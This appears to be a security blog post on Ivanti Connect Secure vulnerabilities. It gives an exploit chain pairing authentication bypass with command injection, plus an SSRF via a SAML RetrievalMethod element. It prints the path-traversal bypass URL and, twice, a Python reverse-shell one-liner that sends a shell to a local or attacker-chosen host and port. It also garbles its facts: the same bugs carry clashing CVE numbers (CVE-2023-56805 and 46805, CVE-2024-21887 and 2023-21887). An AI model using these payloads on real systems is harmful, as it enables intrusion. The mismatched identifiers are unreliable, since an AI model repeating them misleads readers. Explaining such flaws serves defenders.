Overview
Recently, five CVEs have been discovered in Ivanti Connect Secure, a software product designed to offer secure remote access to corporate resources and applications. This product is currently trusted by numerous service providers and government entities. These vulnerabilities encompass authentication bypass, command injection, privilege escalation, server-side request forgery, and XML external entity issues, potentially resulting in remote code execution on affected systems. The presence of public exploits in the wild raises significant security concerns for users of this product.
According to the Fofa search engine, there are over 20,000 exploitable servers if they have not yet been patched.
Orange tsai shared the Severity CVE Statistics of the most used VPN providers. Plus Secure had the lowest rate, and the rate raised in the first beginning of this year
A small brief about the five vulnerabilities shared in the Ivanti knowledge base article shows the impact of the threat to the companies using the solution as being high.
The timeline of the CVE patching and related events indicates a gap between the mitigation of the first two discovered CVEs, specifically CVE-2023-56805 and CVE-2024-21887. These CVEs were identified in the second week of December and were exploited in a chain to achieve remote code execution within the victim network. This posed a significant threat from the time of discovery until the release of patches for all exposed servers on the public network.
CVE-2023-46805 authentication bypass in Rest API the exploitation was by accessing /api/v1/cav/client/status/../../admin/options and this exploitation mechanism was discovered by assetnote blog post and then chained with CVE-2023-21887 over serval vulnerable endpoints to do command injection because it python server-based
;python -c ‘import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“127.0.0.1”,4444));subprocess.call([“/bin/sh”,”-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())’;
TCP reverse shell
CVE-2024-21893 the server-side request forgery when the application uses the SMAL method in authentication, the exploitation of this vulnerability was by sending an XML format included http://127.0.0.1:8090/api/v1/license/keys-status/ in XML format using the RetrievalMethod element to trigger the vulnerability
As shown from a PoC below:
The variable of the attacker_server will be http://attackerserver+;python -c ‘import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“serverip”,port));subprocess.call([“/bin/sh”,”-i”],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())’; to get a reverse shell back on the server_host and port
Mitigation
The advisory recommends that customers factory reset their devices and apply the patches.
Conclusion
Through our blog, it’s evident that nothing can be considered entirely secure, even seemingly robust applications. Companies must take a proactive approach with regular security code reviews to identify vulnerabilities before attackers exploit them to the detriment of customers. It’s worth highlighting that Ivanti, used by governments and service providers, is particularly vulnerable, placing these entities in a critical position. In the realm of cybersecurity, the concept of absolute security doesn’t exist, emphasizing the need for continual efforts and diligence to safeguard against potential threats and protect the interests of both companies and customers.